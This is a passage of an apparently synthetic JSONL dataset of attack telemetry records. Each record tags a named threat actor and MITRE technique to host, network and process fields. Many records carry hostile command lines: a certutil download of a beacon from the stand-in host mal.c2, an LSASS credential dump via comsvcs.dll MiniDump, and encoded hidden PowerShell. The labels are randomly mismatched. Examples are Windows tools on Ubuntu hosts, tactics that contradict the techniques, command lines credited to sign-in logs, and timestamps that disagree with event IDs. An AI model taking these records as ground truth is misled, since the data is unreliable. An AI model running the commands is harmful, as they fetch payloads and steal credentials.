{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Reconnaissance","Initial Access","Credential Access"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20261230T203851000Z_0005695","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.51.27.205","name":"DB-ORACLE-ZLHVGVBF0O","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5695Mustang PandaT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.154.217.118","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-12-05T22:08:50.000Z","user":{"name":"svc_28r21rlhcl18","sid":"S-1-5-21-632591903-807273359-8960"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Defense Evasion","Collection"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20251219T080842000Z_0005697","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.175.202.116","name":"IAM-ROLE-PX71IG75ZR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5697UNC4841T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.116.192.121","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 798 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-01T10:35:53.000Z","user":{"name":"svc_heax9nc8jh2e","sid":"S-1-5-21-435640904-698736927-9227"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Execution"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20250908T220214000Z_0005699","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.78.195.164","name":"DB-ORACLE-ZDN9MBZUXQ","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5699UNC4841T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.175.117.66","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-17T20:16:31.000Z","user":{"name":"i-7o5x8op6irrh","sid":"S-1-5-21-788536198-585694027-2310"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact","Credential Access","Initial Access"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20250201T083342000Z_0005701","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.114.16.85","name":"IAM-ROLE-X85PUWS6EQ","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5701Scattered SpiderT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.121.39.60","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3290 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-04-03T02:49:05.000Z","user":{"name":"svc_4q2ch5bzce8a","sid":"S-1-5-21-330489689-818882926-5975"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20260425T121047000Z_0005703","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.103.123.140","name":"DB-ORACLE-W4R80SY7GX","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5703UNC4841T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.80.66.128","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3816 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-01T07:24:33.000Z","user":{"name":"CORP\\6xskqv6ik62a","sid":"S-1-5-21-367604331-837859057-7800"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20250808T213817000Z_0005705","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.4.182.114","name":"WIN-FIN-SRV-ZQUUTKU3FS","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5705UNC4841T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.146.1.184","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2052 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-04T12:34:25.000Z","user":{"name":"CORP\\a1z3981rxyvz","sid":"S-1-5-21-705376608-955374194-3226"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Defense Evasion"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20250712T045749000Z_0005707","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.253.212.243","name":"IAM-ROLE-Q5Q47EYFMC","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5707APT29T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.13.140.76","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-04-22T05:14:52.000Z","user":{"name":"CORP\\tldfm306rhsk","sid":"S-1-5-21-826475043-668366077-1003"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion","Execution"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260228T181658000Z_0005709","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.254.121.165","name":"DB-ORACLE-ACC9GQJZKG","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5709Lapsus$T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.6.165.12","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-01-01T19:54:40.000Z","user":{"name":"CORP\\lvdsc2hylqgh","sid":"S-1-5-21-457017589-161065406-9400"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260116T070523000Z_0005711","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.27.156.1","name":"DB-ORACLE-5I1URED96P","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5711Volt TyphoonT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.120.137.147","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3722 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-12-16T23:25:52.000Z","user":{"name":"svc_nzsn1eelnpqt","sid":"S-1-5-21-248142490-607355881-9548"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Collection","Lateral Movement","Persistence"],"technique_id":"T1570"},"event_id":"evt_apt41_20251205T153741000Z_0005713","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.117.115.67","name":"EC2-INST-XRXBE0BEYZ","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5713APT41T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.1.130.234","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3072 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-11-05T02:58:08.000Z","user":{"name":"svc_ee43e0ws4law","sid":"S-1-5-21-216662411-431953305-5518"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Privilege Escalation","Execution","Reconnaissance"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20260610T042626000Z_0005715","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.92.112.198","name":"DB-ORACLE-A0CY48L8BW","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5715APT29T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.188.124.207","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-06T11:47:03.000Z","user":{"name":"CORP\\mhthbnq5m7r1","sid":"S-1-5-21-148424500-221121086-9828"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Reconnaissance","Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20261019T052407000Z_0005717","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.183.195.99","name":"DB-ORACLE-ELJWM5827F","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5717Volt TyphoonT1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.46.142.211","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-02-28T22:21:41.000Z","user":{"name":"CORP\\oawbqgx01mk1","sid":"S-1-5-21-605686335-999510418-8611"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion","Collection"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20251205T030229000Z_0005719","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.91.156.111","name":"WIN-FIN-SRV-H325C32WAM","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5719Lapsus$T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.166.255.59","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-31T02:44:38.000Z","user":{"name":"CORP\\cwsrvm6jwas6","sid":"S-1-5-21-770029593-523469602-7343"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Command and Control","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20260316T012204000Z_0005721","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.7.73.206","name":"IAM-ROLE-22JJUY0FCT","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5721Lapsus$T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.175.156.195","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2837 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-02-09T03:31:56.000Z","user":{"name":"svc_xlbthjwj0kkf","sid":"S-1-5-21-594025333-280804062-3599"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250905T170056000Z_0005723","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.74.221.203","name":"IAM-ROLE-JDUNYLLVZX","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5723Lapsus$T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.84.230.35","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-09T07:41:08.000Z","user":{"name":"i-7vj72xljbx88","sid":"S-1-5-21-940508627-335055719-8570"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Collection","Lateral Movement"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20250624T001056000Z_0005725","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.86.252.253","name":"AZURE-VM-4AJFNMXUOM","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5725Mustang PandaT1484.001"},"network":{"domain":"github.com","dst_ip":"1.16.242.161","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-05-02T11:41:39.000Z","user":{"name":"i-rymrbpozi58f","sid":"S-1-5-21-141955005-664945574-5304"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20250708T055041000Z_0005727","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.10.145.232","name":"IAM-ROLE-SC1MOQEH1D","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5727UNC4841T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.48.249.139","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 625 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-11-06T11:52:00.000Z","user":{"name":"i-buaszrb741if","sid":"S-1-5-21-412032705-376524449-8183"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance","Persistence"],"technique_id":"T1098.004"},"event_id":"evt_apt29_20260925T071523000Z_0005729","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.191.211.185","name":"APP-WEB-TD4PJERYU4","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5729APT29T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.87.185.189","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-02T15:05:09.000Z","user":{"name":"azuread\\9lxvo58cf618","sid":"S-1-5-21-557803588-130784018-4363"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control","Impact"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20260928T101537000Z_0005731","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.150.20.139","name":"IAM-ROLE-JVP6977DOC","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5731Scattered SpiderT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.55.170.136","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1457 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-12T10:35:06.000Z","user":{"name":"CORP\\ry4iqbgig83q","sid":"S-1-5-21-706503870-830514461-5693"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution","Reconnaissance","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20250522T140729000Z_0005733","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.163.171.9","name":"APP-WEB-CDG2WOJH0A","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5733Mustang PandaT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.88.3.114","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-07-14T06:57:54.000Z","user":{"name":"svc_jv62n5ts87r4","sid":"S-1-5-21-393461118-908733362-2888"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20260106T071137000Z_0005735","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.174.86.63","name":"WIN-FIN-SRV-5GMWEJQ0PZ","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5735Mustang PandaT1021.006"},"network":{"domain":"github.com","dst_ip":"1.78.117.67","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-09-12T19:41:48.000Z","user":{"name":"svc_4xvfxlxorjtu","sid":"S-1-5-21-520422919-866796217-9789"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Privilege Escalation","Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20251028T000921000Z_0005737","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.124.86.61","name":"APP-WEB-QJG2S5BVET","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5737Volt TyphoonT1098.004"},"network":{"domain":"github.com","dst_ip":"1.12.226.169","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 767 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-20T17:18:47.000Z","user":{"name":"azuread\\jkvdhaqbdjad","sid":"S-1-5-21-177155486-776240146-4660"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20250223T170847000Z_0005739","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.193.188.3","name":"AZURE-VM-9LBF0DXLUO","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5739APT41T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.15.221.144","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3182 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-04-18T12:15:46.000Z","user":{"name":"i-j35anhyc3s2t","sid":"S-1-5-21-746699188-618622649-1044"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Initial Access"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20250606T024932000Z_0005741","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.146.148.109","name":"EC2-INST-42H6J84L2L","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5741FIN7T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.92.6.76","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin 